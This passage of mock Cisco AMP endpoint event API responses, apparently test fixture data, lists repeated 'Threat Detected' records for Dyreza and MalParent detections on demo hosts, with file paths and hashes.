Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 